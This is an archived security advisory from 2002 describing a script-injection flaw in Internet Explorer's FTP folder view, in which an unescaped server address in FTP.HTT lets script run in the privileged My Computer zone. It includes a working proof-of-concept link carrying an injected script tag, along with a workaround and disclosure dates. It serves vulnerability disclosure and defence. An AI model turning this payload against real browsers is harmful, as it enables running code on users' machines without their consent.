Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

From: Eiji James Yoshida (ptrs-ejyat_private)
Date: Thu Jun 06 2002 - 08:33:44 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    + Title:
    ~~~~~~~~~~~~~~~~~
    Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
    
    
    + Date:
    ~~~~~~~~~~~~~~~~~
    7 June 2002
    
    
    + Author:
    ~~~~~~~~~~~~~~~~~
    Eiji James Yoshida [zaddikat_private]
    
    
    + Risk:
    ~~~~~~~~~~~~~~~~~
    Medium
    
    
    + Vulnerable:
    ~~~~~~~~~~~~~~~~~
    Windows2000 SP2 IE5.5SP1
    Windows2000 SP2 IE5.5SP2
    Windows2000 SP2 IE6.0
    
    
    + Overview:
    ~~~~~~~~~~~~~~~~~
    IE allows arbitrary script to run because of a bug in the 'Folder view for FTP sites' feature.
    
    If both the 'Enable folder view for FTP sites' IE Advanced Setting
    and the 'Enable Web content in folders' Explorer Folder Option are enabled,
    a script embedded in the FTP server address will run.
    (Both options are enabled by default.)
    
     * Note that the script runs in the My Computer zone, the least
       restricted of IE's security zones.
    
    
    + Details:
    ~~~~~~~~~~~~~~~~~
    The problem is in FTP.HTT, the template that the 'Folder view for FTP sites' feature renders.
    ( %SystemRoot%\WEB\FTP.HTT )
    
    - --------------------FTP.HTT--------------------
    35:    <BASE href="%THISDIRPATH%\">
    - -----------------------------------------------
    
    The value substituted for '%THISDIRPATH%' is inserted into the href attribute without being escaped,
    so a double quote in the FTP server address closes the attribute and everything after it is parsed as HTML.
    
    (Example 1)
    [ ftp://TARGET ]
        '%THISDIRPATH%' = 'ftp://TARGET/'
        <BASE href="ftp://TARGET/\">
                    ~~~~~~~~~~~~~
    (Example 2)
    [ ftp://"><script>alert("Exploit");</script> ]
        '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
        <BASE href="ftp://"><script>alert("Exploit");</script>/\">
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    + Exploit code:
    ~~~~~~~~~~~~~~~~~
    <a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
    
    
    + Demonstration:
    ~~~~~~~~~~~~~~~~~
    http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html
    
    
    + Workaround:
    ~~~~~~~~~~~~~~~~~
    Disable either 'Enable folder view for FTP sites' IE Advanced Setting 
    or 'Enable Web content in folders' Explorer Folder Option.
    
    
    + Vendor status:
    ~~~~~~~~~~~~~~~~~
    Microsoft was notified on 21 December 2001.
    
    
    - ----------------------------------------------------------------------
    Eiji "James" Yoshida
    penetration technique research site
    E-mail: zaddikat_private
    URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
    - ----------------------------------------------------------------------
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5.8ckt
    Comment: Eiji James Yoshida
    
    iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA
    55mgpZ0K8d9mx/c0pS2Knqoe
    =PTNT
    -----END PGP SIGNATURE-----
    